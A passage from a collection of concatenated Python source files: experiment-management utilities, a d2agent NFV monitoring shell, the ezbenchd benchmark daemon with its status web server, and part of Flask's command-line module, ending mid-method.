argname_lst.extend(k)
else:
argname_lst.append(k)
# guarantee no repeats.
assert len(set(argname_lst)) == len(argname_lst)
# resorting the tuples according to sorting permutation.
idxs = tb_ra.argsort(argname_lst, [lambda x: x])
argname_lst = tb_ra.apply_permutation(argname_lst, idxs)
argval_lst_lst = [
tb_ra.apply_permutation(vs, idxs) for vs in argval_lst_lst
]
return (argname_lst, argval_lst_lst)
# NOTE: this has been made a bit restrictive, but captures the main functionality
# that it is required to generate the experiments.
def copy_regroup_config_generator(d_gen, d_update):
# all keys in the regrouping dictionary have to be in the original dict
flat_ks = []
for k in d_update:
if isinstance(k, tuple):
assert all([ki in d_gen for ki in k])
flat_ks.extend(k)
else:
assert k in d_gen
flat_ks.append(k)
# no tuple keys. NOTE: this can be relaxed by flattening, and reassigning
# but this is more work.
assert all([not isinstance(k, tuple) for k in d_gen])
# no keys that belong to multiple groups.
assert len(flat_ks) == len(set(flat_ks))
# regrouping of the dictionary.
proc_d = dict(d_gen)
for (k, v) in d_update.iteritems():
# check that the dimensions are consistent.
assert all([((not isinstance(vi, tuple)) and
(not isinstance(vi, tuple))) or len(vi) == len(k)
for vi in v])
if isinstance(k, tuple):
# remove the original keys
map(proc_d.pop, k)
proc_d[k] = v
else:
proc_d[k] = v
return proc_d
# TODO: perhaps fix the API with regards to kwargs for consistency with
# other examples.
def run_guarded_experiment(experiment_fn, maxmemory_mbs, maxtime_secs,
**kwargs):
start = time.time()
p = multiprocessing.Process(target=experiment_fn, kwargs=kwargs)
p.start()
while p.is_alive():
p.join(1.0)
try:
mbs_p = tb_lg.memory_process(p.pid)
if mbs_p > maxmemory_mbs:
print "Limit of %0.2f MB exceeded. Terminating." % maxmemory_mbs
p.terminate()
secs_p = time.time() - start
if secs_p > maxtime_secs:
print "Limit of %0.2f secs exceeded. Terminating." % maxtime_secs
p.terminate()
except psutil.NoSuchProcess:
pass
def run_parallel_experiment(experiment_fn, iter_args):
ps = []
for args in iter_args:
p = multiprocessing.Process(target=experiment_fn, args=args)
p.start()
ps.append(p)
for p in ps:
p.join()
class ArgsDict:
def __init__(self, filepath=None):
self.d = {}
if filepath != None:
self._read(filepath)
def set_arg(self, key, val, abort_if_exists=True):
assert (not abort_if_exists) or key not in self.d
assert (type(key) == str and len(key) > 0)
self.d[key] = val
def write(self, filepath):
tb_io.write_jsonfile(self.d, filepath)
def _read(self, filepath):
return tb_io.read_jsonfile(filepath)
def get_dict(self):
return dict(self.d)
class SummaryDict:
def __init__(self, filepath=None, abort_if_different_lengths=False):
self.abort_if_different_lengths = abort_if_different_lengths
if filepath != None:
self.d = self._read(filepath)
else:
self.d = {}
self._check_consistency()
def append(self, d):
for k, v in d.iteritems():
assert type(k) == str and len(k) > 0
if k not in self.d:
self.d[k] = []
self.d[k].append(v)
self._check_consistency()
# NOTE: maybe write is not useful
def write(self, filepath):
tb_io.write_jsonfile(self.d, filepath)
def _read(self, filepath):
return tb_io.read_jsonfile(filepath)
def _check_consistency(self):
assert (not self.abort_if_different_lengths) or (len(
set([len(v) for v in self.d.itervalues()])) <= 1)
def get_dict(self):
return dict(self.d)
# perhaps also add a meta data json file per item stored.
class MemoManager:
def __init__(self, folderpath, create_if_notexists=False):
self.folderpath = folderpath
self.key_to_filename = {}
tb_fs.create_folder(
folderpath,
abort_if_exists=False,
create_parent_folders=create_if_notexists)
# initialize the memo based on the state of the folder.
for fpath in tb_fs.list_files(folderpath):
fname_with_ext = tb_fs.path_last_element(fpath)
if fname_with_ext.startswith('config-') and fname_with_ext.endswith(
'.json'):
fname = fname_with_ext[len('config-'):-len('.json')]
config = tb_io.read_jsonfile(fpath)
key = self._key_from_config(config)
self.key_to_filename[key] = fname
def _key_from_config(self, config):
return json.dumps(config, sort_keys=True)
def _get_unique_filename(self):
while True:
filename = uuid.uuid4()
if not tb_fs.file_exists(
tb_fs.join_paths(
[self.folderpath,
"config-%s.json" % filename])):
return filename
def _get_filepath(self, filetype, filename, fileext):
return tb_fs.join_paths(
[self.folderpath,
"%s-%s.%s" % (filetype, filename, fileext)])
def is_available(self, config):
key = self._key_from_config(config)
return key in self.key_to_filename
def write(self, config, value, abort_if_exists=True):
key = self._key_from_config(config)
assert not abort_if_exists or key not in self.key_to_filename
# if it exists, get it from the dictionary.
if key in self.key_to_filename:
filename = self.key_to_filename[key]
else:
filename = self._get_unique_filename()
config_filepath = self._get_filepath('config', filename, 'json')
tb_io.write_jsonfile(config, config_filepath)
value_filepath = self._get_filepath('value', filename, 'pkl')
tb_io.write_picklefile(value, value_filepath)
self.key_to_filename[key] = filename
def read(self, config):
key = self._key_from_config(config)
filename = self.key_to_filename[key]
value_filepath = self._get_filepath('value', filename, 'pkl')
return tb_io.read_picklefile(value_filepath)
def delete_conditionally(self, delete_cond_fn):
del_lst = []
for filename in self.key_to_filename.itervalues():
config_filepath = self._get_filepath('config', filename, 'json')
config = tb_io.read_jsonfile(config_filepath)
if delete_cond_fn(config):
value_filepath = self._get_filepath('value', filename, 'pkl')
tb_fs.delete_file(config_filepath)
tb_fs.delete_file(value_filepath)
del_lst.append(config)
# remove the configs from the dictionary.
for config in del_lst:
key = self._key_from_config(config)
self.key_to_filename.pop(key)
def get_configs(self):
cfgs = []
for filename in self.key_to_filename.itervalues():
d = tb_io.read_jsonfile(
self._get_filepath('config', filename, 'json'))
cfgs.append(d)
return cfgs
|
main.py | #!/usr/bin/env python3
import signal
import threading
import readline
from cmd import Cmd
import d2agent
class Shell(Cmd):
agent = {}
prompt = "d2agent> "
intro = " _____ \n"
intro = intro + " / ____| \n"
intro = intro + "| (___ _ _ ___ __ _ _ __ _____ __\n"
intro = intro + " \\___ \\| | | / __|/ _` | '_ \\ / _ \\ \\ /\\ / /\n"
intro = intro + " ____) | |_| \\__ \\ (_| | | | | (_) \\ V V / \n"
intro = intro + "|_____/ \\__,_|___/\\__,_|_| |_|\\___/ \\_/\\_/ \n"
def __init__(self, ag):
self.agent = ag
Cmd.__init__(self)
def emptyline(self): pass
def do_quit(self, arg): self.agent.cmd_quit()
def do_vnf(self, arg): self.agent.cmd_vnf(arg)
def do_nfvi(self, arg): self.agent.cmd_nfvi(arg)
def do_thrd(self, arg): self.agent.cmd_thrd(arg)
def do_sys(self, arg): self.agent.cmd_sys(arg)
def main():
def cb_sigint(num, frame): pass
signal.signal(signal.SIGINT, cb_sigint)
agent = d2agent.d2agent()
agent.background_d2monitor = background_d2monitor
agent.nfvi_add('nfvi0', 'labnet5.dpdk.ninja', 8888)
agent.vnf_add('vnf0', 'nfvi0')
agent.vnf_add('vnf1', 'nfvi0')
# agent.vnf_d2mon('vnf0', 'on')
shell = threading.Thread(target=Shell(agent).cmdloop, name='shell')
shell.start()
def background_d2monitor(d2vnfobj, agent):
import time
import math
import susanow.d2 as d2
from d2agent import ts
from d2agent import cast
from d2agent import myThread
assert(isinstance(d2vnfobj , d2agent.d2vnf ))
assert(isinstance(agent , d2agent.d2agent))
ssn_nfvi = d2vnfobj.nfvi.cast2ssn()
ssn_vnf = ssn_nfvi.get_vnf(d2vnfobj.name)
if (ssn_vnf == None):
print('vnf not found')
return
seeds = []
f = open('/tmp/ssn_d2log.log', 'a')
f.write('[{}] {} start d2 monitoring\n'.format(ts(), ssn_vnf.name()))
f.flush()
while True:
cur_thrd = threading.current_thread()
cast(myThread, cur_thrd)
if (cur_thrd.running_flag == False): break
ssn_vnf.sync()
n_core = ssn_vnf.n_core()
rxrate = ssn_vnf.rxrate()
perf = math.floor(ssn_vnf.perfred() * 100)
perf = 100 if (perf>100) else perf
max_rate = 17000000
if (perf < 90):
f.write('[{}] {} d2out\n'.format(ts(), ssn_vnf.name()))
f.flush()
d2.d2out(ssn_vnf, ssn_nfvi)
else:
if (n_core == 1): pass
elif (n_core == 2):
if (perf > 85):
if (rxrate < (max_rate*0.3)):
f.write('[{}] {} d2in pattern2\n'
.format(ts(), ssn_vnf.name()))
f.flush()
d2.d2in(ssn_vnf, ssn_nfvi)
elif (n_core == 4):
if (perf > 85):
if (rxrate < (max_rate*0.6)):
f.write('[{}] {} d2in pattern1\n'
.format(ts(), ssn_vnf.name()))
f.flush()
d2.d2in(ssn_vnf, ssn_nfvi)
seed = { ssn_vnf.rxrate(), ssn_vnf.perfred(), ssn_vnf.n_core()}
seeds.append(seed)
time.sleep(0.5)
f.write('[{}] finish d2 monitoring\n'.format(ts()))
f.flush()
f.close()
return
if __name__ == '__main__':
main()
|
ezbenchd.py | #!/usr/bin/env python3
"""
Copyright (c) 2015, Intel Corporation
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import multiprocessing
import argparse
import signal
import time
import sys
import os
from datetime import datetime
ezbench_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(ezbench_dir, 'python-modules'))
from ezbench.smartezbench import *
from stats import compare_reports
def setup_http_server(bind_ip = "0.0.0.0", port = 8080):
from mako.template import Template
import http.server
import socket
import threading
import socketserver
list_template = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ezbenchd: Status page</title>
</head>
<body>
<h1>Ezbenchd: Status page</h1>
<h2>Reports</h2>
<p>Here is the list of available reports</p>
<ul>
% for sbench in sbenches:
<%
sbench = sbenches[sbench]
report_name = sbench.report_name
%>
<li>${report_name}: <a href="/file/${report_name}/">report</a>, <a href="/status/${report_name}/">status</a> (${sbench.running_mode().name})</li>
% endfor
</ul>
</body>
</html>
"""
status_template = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ezbenchd: Status page</title>
<style>
a.button {
-webkit-appearance: button;
-moz-appearance: button;
appearance: button;
text-decoration: none;
color: initial;
padding: 3px;
}
</style>
</head>
<%
from datetime import timedelta
mode = sbench.running_mode().name
task_cur, task_list, events = sbench.task_info()
total_time_left = 0
if task_cur is not None:
time = task_cur.remaining_time().total_seconds()
if time > 0:
total_time_left += time
if task_list is not None:
for task in task_list:
if task is None:
continue
time = task.remaining_time().total_seconds()
if time > 0:
total_time_left += time
total_time_left = timedelta(seconds=int(total_time_left))
%>
<body>
<h1>Ezbenchd report '${report_name}'</h1>
<h2>Status</h2>
<p>General information about the report</p>
<table>
<tr><th>Name</th><th>Value</th><th>Actions</th></tr>
<tr><td>Report name</td><td>${report_name}</td><td></td></tr>
<tr><td>Running mode</td><td>${mode}</td><td>
% if mode != "RUN" and mode != "RUNNING":
<a href="/mode/${report_name}/run" class="button">Run</a>
% else:
<a href="/mode/${report_name}/pause" class="button">Pause</a>
% endif
</td></tr>
<tr><td>Log file</td><td></td><td><a href="/file/${report_name}/smartezbench.log" class="button">View</a></td></tr>
</table>
<h2>Tasks</h2>
% if task_cur is not None:
<p>Current task: ${task_cur}</p>
%endif
<p><ul>
% if task_list is not None and len(task_list) > 0:
% for task in task_list:
<li>${task}</li>
% endfor
%elif task_list is not None:
<li>No tasks left</li>
% else:
<li>Unknown task list</li>
% endif
</ul></p>
<p>Total remaining time: ${total_time_left}s</p>
<h2>Events</h2>
<ul>
% if events is not None and len(events) > 0:
% for event in events:
<li>${event}</li>
% endfor
% else:
<li>No events</li>
% endif
</ul>
</body>
</html>
"""
class CustomHTTPHandler(http.server.SimpleHTTPRequestHandler):
def parse_request(self, *args, **kwargs):
return super().parse_request(*args, **kwargs)
def __serve_file__(self, report_name, filename, content_type = "text/plain"):
msg = "unknown error"
if not filename:
filename = "index.html"
content_types = {"html": "text/html", "png": "image/png"}
extension = os.path.splitext(filename)[1][1:]
if extension in content_types:
content_type = content_types[extension]
chroot_folder = "{}/logs/{}".format(ezbench_dir, report_name)
path = "{}/{}".format(chroot_folder, filename)
real_path = os.path.realpath(path)
if real_path.startswith(chroot_folder):
try:
with open(real_path, 'rb') as f:
f.seek(0, os.SEEK_END)
size = f.tell()
f.seek(0, os.SEEK_SET)
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Content-length", size)
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
while True:
data = f.read(1024)
if not data:
break
self.wfile.write(data)
return
except Exception as e:
print("WARNING: An exception got raised while reading file '{}': {}".format(real_path, e))
msg = "Invalid file name"
pass
else:
print("WARNING: Tried to serve a file ('{}') outside of our chroot ('{}')".format(real_path, chroot_folder))
msg = "Invalid path"
array = str.encode(msg)
self.send_response(404)
self.send_header("Content-type", content_type)
self.send_header("Content-length", len(array))
self.end_headers()
self.wfile.write(array)
def do_GET(self):
response = 200
loc = ""
html = ""
m = re.search("^/([a-z]+)/(.*)/(.*)$", self.path)
if m is not None and len(m.groups()) >= 2:
cmd = m.groups()[0]
report_name = m.groups()[1]
args = m.groups()[2]
if cmd != "" and report_name != "" and report_name in sbenches:
if cmd == "file":
return self.__serve_file__(report_name, args)
elif cmd == "mode" or cmd == "status":
sbench = sbenches[report_name]
if cmd == "mode":
if args == "run":
sbench.set_running_mode(RunningMode.RUN)
loc = "/status/{}/".format(report_name)
elif args == "pause":
sbench.set_running_mode(RunningMode.PAUSE)
loc = "/status/{}/".format(report_name)
else:
html = "Invalid mode '{}'".format(args)
html = Template(status_template).render(sbench=sbench,
report_name=report_name)
else:
response = 404
html = "Report name '{}' does not exist".format(report_name)
if html == "" and loc == "":
html = Template(list_template).render(sbenches=sbenches)
if loc != "":
self.send_response(302)
self.send_header('Location', loc)
else:
# Add a footer
if response == 200:
date = datetime.now().strftime("%A, %d. %B %Y %H:%M:%S")
f = "<footer>Autogenerated by Ezbenchd on {}.</footer>".format(date)
html += f
self.send_response(response)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(html))
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(str.encode(html))
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
server = ThreadedTCPServer((bind_ip, port), CustomHTTPHandler, bind_and_activate=False)
server.allow_reuse_address = True
server.server_bind()
server.server_activate()
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
setup_http_server.server = server
setup_http_server.server_thread = server_thread
def teardown_htttp_server():
setup_http_server.server.shutdown()
setup_http_server.server.server_close()
stop_requested = False
def stop_handler(signum, frame):
global stop_requested
stop_requested = True
print("-- The user requested to abort! --")
# TODO: Abort faster than after every run
return
def reload_conf_handler(signum, frame):
# TODO
return
# parse the options
parser = argparse.ArgumentParser()
parser.add_argument("--embed", action="store_true")
parser.add_argument("--http_server", help="Generate an HTTP interface to show the status of the reports. Format: listen_ip:port")
parser.add_argument("--hook", help="Path to the binary to call when certain events happen.")
args = parser.parse_args()
# Set up the http server
if args.http_server is not None:
fields = args.http_server.split(":")
setup_http_server(fields[0], int(fields[1]))
# handle the signals systemd asks us to
signal.signal(signal.SIGTERM, stop_handler)
signal.signal(signal.SIGINT, stop_handler)
signal.signal(signal.SIGHUP, reload_conf_handler)
reportStateModDate = dict()
sbenches = dict()
def sbench_run(report_name):
sbench = SmartEzbench(ezbench_dir, report_name)
report = sbench.schedule_enhancements()
# Generate an HTML with the report returned by schedule_enhancements
clock_start = time.clock()
compare_reports.reports_to_html([report],
"{}/logs/{}/index.html".format(ezbench_dir, sbench.report_name),
output_unit = "fps",
commit_url = sbench.commit_url(),
verbose = False,
embed = args.embed)
print("Generated an HTML report in {:.2f} seconds".format(time.clock() - clock_start))
lastPoll = 0
while not stop_requested:
futureLastPoll = time.time()
reports = list_smart_ezbench_report_names(ezbench_dir, lastPoll)
lastPoll = futureLastPoll
for report_name in reports:
try:
if report_name not in sbenches:
sbench = SmartEzbench(ezbench_dir, report_name, hook_binary_path=args.hook)
sbenches[report_name] = sbench
else:
sbench = sbenches[report_name]
if sbench.running_mode() == RunningMode.RUN:
sbench.run()
# Run the report generation in a separate process because python
# is really bad at freeing memory
p = multiprocessing.Process(target=sbench_run,
args=(report_name,))
p.start()
p.join()
except Exception as e:
traceback.print_exc(file=sys.stderr)
sys.stderr.write("\n")
pass
# TODO: Replace this by inotify
time.sleep(1)
# Tear down the http server
if args.http_server is not None:
teardown_htttp_server()
|
cli.py | import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in {"create_app", "make_app"}:
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
)
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if (
not args
and len(sig.parameters) == 1
and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
)
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
)
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
)
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.")
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
raise exc_info
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
